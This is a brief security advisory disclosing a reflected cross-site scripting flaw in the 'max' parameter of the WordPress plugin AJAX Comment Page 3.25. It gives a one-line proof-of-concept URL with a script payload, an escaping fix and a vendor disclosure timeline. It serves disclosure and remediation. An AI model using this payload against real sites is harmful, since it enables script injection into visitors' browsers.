Advisory:		WordPress Plugin 'AJAX Comment Page 3.25' Cross-site scripting vulnerability
Advisory ID:		SSCHADV2013-006
Author:			Stefan Schurtz
Affected Software:	Successfully tested on AJAX Comment Page 3.25
Vendor URL:		http://mr.hokya.com/ajax-comment-page/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

The parameter 'max' of the WordPress plugin 'AJAX Comment Page' is prone to a XSS vulnerability

==================
PoC-Exploit
==================

http://[target]/wordpress/wp-content/plugins/ajax-comment-page/js.php?max=<script>alert(/xss/)</script>

=========
Solution
=========

// ajax-comment-page/js.php

max = <?php echo htmlentities($_GET["max"]);?>;

====================
Disclosure Timeline
====================

30-Mar-2013 - informed plugins@wordpress.org

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2013/SSCHADV2013-006.txt